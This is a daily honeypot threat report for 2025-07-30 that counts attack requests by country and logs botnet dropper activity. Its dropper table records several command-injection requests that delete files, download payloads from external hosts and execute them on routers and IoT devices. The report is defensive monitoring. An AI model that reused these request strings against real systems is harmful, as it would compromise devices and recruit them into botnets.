Table of Contents

Daily Report: 2025-07-30
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 7 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 1 new requests that have never been observed before (these were added to the monitored request database.).

A total of 438 requests were recorded during the day, originating from 7 different countries, with a peak of 99 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
FR	Germany

botnet_dropper_behaviour
#

remote_addr	request
8.219.194.246	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.6.61	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.58.39	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
87.121.84.132	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28wget%20-qO-%20http%3A%2F%2F83.252.42.112%2Frondo.zqq.sh%7Csh%3B%29 HTTP/1.1
120.39.222.178	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.213.136.165	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.153.34.225	GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Bpkill%20-9%20bin.arm7%3Brm%20-rf%20build.armv7l%3Bwget%20http%3A%2F%2F107.189.27.205%2Fns%2Fbuild.armv7l%3Bchmod%20777%20build.armv7l%3B.%2Fbuild.armv7l%20nasdevice.armv7l%3Brm%20-rf%20build.armv7l HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
9	4	POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	99	US
1	90	VN
2	62	GB
3	31	NL
4	26	FR
5	17	BG
6	17	PL
7	16	SG
8	12	CH
9	10	DE
10	7	HK
11	7	IN
12	5	SC
13	5	TH
14	5	CA
15	4	KR
16	4	LT
17	4	RU
18	4	CN
19	3	MU
20	3	ZA
21	2	BE
22	2	KZ
23	1	ID
24	1	ES
25	1	PT

Report: 2025-07-29

29 July 2025·280 words

Repport Daily

Report: 2025-07-28

28 July 2025·338 words

Repport Daily

Report: 2025-07-27

27 July 2025·337 words

Repport Daily

	number_of_occurence	country_iso_code
0	99	US
1	90	VN
2	62	GB
3	31	NL
4	26	FR
5	17	BG
6	17	PL
7	16	SG
8	12	CH
9	10	DE
10	7	HK
11	7	IN
12	5	SC
13	5	TH
14	5	CA
15	4	KR
16	4	LT
17	4	RU
18	4	CN
19	3	MU
20	3	ZA
21	2	BE
22	2	KZ
23	1	ID
24	1	ES
25	1	PT

	number_of_occurence	country_iso_code
0	99	US
1	90	VN
2	62	GB
3	31	NL
4	26	FR
5	17	BG
6	17	PL
7	16	SG
8	12	CH
9	10	DE
10	7	HK
11	7	IN
12	5	SC
13	5	TH
14	5	CA
15	4	KR
16	4	LT
17	4	RU
18	4	CN
19	3	MU
20	3	ZA
21	2	BE
22	2	KZ
23	1	ID
24	1	ES
25	1	PT

Daily Report: 2025-07-30#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-07-30
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	99	US
1	90	VN
2	62	GB
3	31	NL
4	26	FR
5	17	BG
6	17	PL
7	16	SG
8	12	CH
9	10	DE
10	7	HK
11	7	IN
12	5	SC
13	5	TH
14	5	CA
15	4	KR
16	4	LT
17	4	RU
18	4	CN
19	3	MU
20	3	ZA
21	2	BE
22	2	KZ
23	1	ID
24	1	ES
25	1	PT